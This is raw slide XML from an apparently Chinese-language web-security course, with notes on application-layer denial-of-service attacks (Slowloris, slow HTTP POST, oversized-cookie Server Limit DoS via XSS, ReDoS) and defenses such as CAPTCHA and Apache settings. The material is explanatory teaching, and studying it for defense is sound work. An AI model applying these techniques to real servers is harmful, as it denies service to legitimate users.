              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>确定客户端，攻击者可以使用代理服务器发起攻击突破该限制）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>资源耗尽攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Slowloris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击：以极低的速度往服务器发送 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>请求。由于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对于并发的连接数都有一定的上限，因此若恶意地占用这些连接不释放，那么 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的所有连接都将被恶意连接占用，从而无法接受新的请求，导致拒绝服务。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP POST DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：在发送 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>包时，指定一个非常大的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Content-Length </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>值，然后以很低的速度发包，比如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>10~100s  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>发送一个字节，保持住这个连接不断开。当客户端连接数多了以后，占用住了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的所有可用连接，从而导致 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server Limit DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>包头的长度有限制，如果客户端发送的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>包头超过限制，服务器将返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>错误。攻击者可以通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>往客户端写入一个超长的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，则用户在清空 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>前将无法再访问该 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>所在域的任何页面（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>是存放在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>包头里发送的）。防御：可以将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的配置参数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LimitRequestFieldSize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>设置为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>（大小不限制）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>正则表达式引发的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>——ReDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>正则表达式是基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NFA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的一个状态机，每个状态和输入符号都可能有许多不同的下一个状态。正则解析引擎将遍历所有可能的路径直到最后。由于每个状态都有若干个“下一个状态”，因此决策算法将逐个尝试每种情况，直到匹配到一个路径。如果正则表达式编写不当，将引起解析过程变复杂，消耗计算资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32335554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Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>防御应用层 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>人机识别（验证码）是应用层防御 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的好物，只是会影响用户的体验。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的配置中，有些参数可以缓解 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
